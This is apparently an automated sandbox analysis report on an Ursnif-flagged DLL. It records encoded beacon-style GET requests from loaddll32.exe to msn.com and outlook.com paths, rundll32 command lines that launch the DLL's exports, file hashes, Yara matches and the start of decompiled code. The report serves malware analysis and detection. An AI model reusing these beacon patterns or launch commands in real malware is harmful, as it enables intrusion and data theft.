                                                                                                                                Location: https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre
                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Date: Mon, 11 Oct 2021 22:50:46 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 379
                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36m


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49766 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:51:00 UTC | 1 | OUT | GET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: msn.com
2021-10-11 22:51:00 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Location: https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre
                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Date: Mon, 11 Oct 2021 22:50:59 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 373
                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVob


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49779 | 40.97.161.50 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:51:28 UTC | 2 | OUT | GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.com
2021-10-11 22:51:28 UTC | 2 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 317cc244-0722-c41d-2bc6-bdaf257bb4d7
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: MWHPR11CA0034
                                                                                                                                X-RequestId: 46bbf0e0-7ef8-408f-a392-a9dc993be4c6
                                                                                                                                MS-CV: RMJ8MSIHHcQrxr2vJXu01w.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: MWHPR11CA0034
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49782 | 52.98.207.210 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:51:28 UTC | 3 | OUT | GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: www.outlook.com
2021-10-11 22:51:28 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: bbc58b63-0200-d637-1f82-5fe41ae08c7e
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: AS9PR0301CA0054
                                                                                                                                X-RequestId: 884c23bc-6988-4e6b-ba85-13b6a6e7802c
                                                                                                                                MS-CV: Y4vFuwACN9Yfgl/kGuCMfg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AS9PR0301CA0054
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49783 | 40.101.60.226 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:51:28 UTC | 4 | OUT | GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.office365.com
2021-10-11 22:51:28 UTC | 5 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Content-Length: 1245
                                                                                                                                Content-Type: text/html
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: f95b0919-28f4-47a7-648d-aec4a884b896
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-CalculatedFETarget: DB6PR07CU001.internal.outlook.com
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-FEProxyInfo: DB6PR07CA0023.EURPRD07.PROD.OUTLOOK.COM
                                                                                                                                X-CalculatedBETarget: DB7P194MB0474.EURP194.PROD.OUTLOOK.COM
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-RUM-Validated: 1
                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                X-Proxy-BackendServerStatus: 404
                                                                                                                                MS-CV: GQlb+fQop0dkja7EqIS4lg.1.1
                                                                                                                                X-FEServer: DB6PR07CA0023
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AM5P194CA0003
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                2021-10-11 22:51:28 UTC | 6 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                5 | 192.168.2.3 | 49816 | 40.97.161.50 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                                                2021-10-11 22:51:43 UTC | 7 | OUT | GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.com
                                                                                                                                2021-10-11 22:51:43 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 2129bc54-af0a-cd98-b796-ce58b9a66f1a
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: MWHPR11CA0044
                                                                                                                                X-RequestId: 520fcc81-91de-431f-b63c-64a04ba5b2fa
                                                                                                                                MS-CV: VLwpIQqvmM23ls5YuaZvGg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: MWHPR11CA0044
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:43 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                6 | 192.168.2.3 | 49820 | 52.98.207.210 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                                                2021-10-11 22:51:43 UTC | 8 | OUT | GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: www.outlook.com
                                                                                                                                2021-10-11 22:51:43 UTC | 8 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: dba8ebf3-3dce-76c0-0ac8-5a534885a9c6
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: AS9PR0301CA0045
                                                                                                                                X-RequestId: 7aae346b-564a-41f4-8c31-dc0c482e6c9d
                                                                                                                                MS-CV: 8+uo2849wHYKyFpTSIWpxg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AS9PR0301CA0045
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:42 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                7 | 192.168.2.3 | 49821 | 40.101.60.226 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                                                2021-10-11 22:51:43 UTC | 9 | OUT | GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.office365.com
                                                                                                                                2021-10-11 22:51:43 UTC | 9 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Content-Length: 1245
                                                                                                                                Content-Type: text/html
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 7ba0ffc6-f8f8-51ea-5952-b8c598033637
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-CalculatedFETarget: PR3P195CU001.internal.outlook.com
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-FEProxyInfo: PR3P195CA0027.EURP195.PROD.OUTLOOK.COM
                                                                                                                                X-CalculatedBETarget: PR3P194MB0683.EURP194.PROD.OUTLOOK.COM
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-RUM-Validated: 1
                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                X-Proxy-BackendServerStatus: 404
                                                                                                                                MS-CV: xv+ge/j46lFZUrjFmAM2Nw.1.1
                                                                                                                                X-FEServer: PR3P195CA0027
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AM5P194CA0015
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:42 GMT
                                                                                                                                Connection: close
                                                                                                                                2021-10-11 22:51:43 UTC | 10 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Start time: 00:49:03
                                                                                                                                Start date: 12/10/2021
                                                                                                                                Path: C:\Windows\System32\loaddll32.exe
                                                                                                                                Wow64 process (32bit): true
                                                                                                                                Commandline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                                                                                                                                Imagebase: 0x13b0000
                                                                                                                                File size: 893440 bytes
                                                                                                                                MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                Has elevated privileges: true
                                                                                                                                Has administrator privileges: true
                                                                                                                                Programmed in: C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                Reputation: moderate

                                                                                                                                General

                                                                                                                                Start time: 00:49:04
                                                                                                                                Start date: 12/10/2021
                                                                                                                                Path: C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit): true
                                                                                                                                Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                                Imagebase: 0xd80000
                                                                                                                                File size: 232960 bytes
                                                                                                                                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                Has elevated privileges: true
                                                                                                                                Has administrator privileges: true
                                                                                                                                Programmed in: C, C++ or other language
                                                                                                                                Reputation: high

                                                                                                                                General

                                                                                                                                Start time: 00:49:04
                                                                                                                                Start date: 12/10/2021
                                                                                                                                Path: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit): true
                                                                                                                                Commandline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                                                                                                                                Imagebase: 0x1160000
                                                                                                                                File size: 61952 bytes
                                                                                                                                MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges: true
                                                                                                                                Has administrator privileges: true
                                                                                                                                Programmed in: C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation: high

                                                                                                                                General

                                                                                                                                Start time: 00:49:04
                                                                                                                                Start date: 12/10/2021
                                                                                                                                Path: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit): true
                                                                                                                                Commandline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                                Imagebase: 0x1160000
                                                                                                                                File size: 61952 bytes
                                                                                                                                MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges: true
                                                                                                                                Has administrator privileges: true
                                                                                                                                Programmed in: C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:00:49:08
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:00:49:13
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                                                                                                                                Imagebase:0x1160000
                                                                                                                                File size:61952 bytes
                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:00:50:43
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:00:50:49
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Start time:00:50:53
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Disassembly

                                                                                                                                Code Analysis


                                                                                                                                  Executed Functions

                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                  			E6E8D1172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				struct _FILETIME* _v16;
                                                                                                                                  				short _v60;
                                                                                                                                  				struct _FILETIME* _t14;
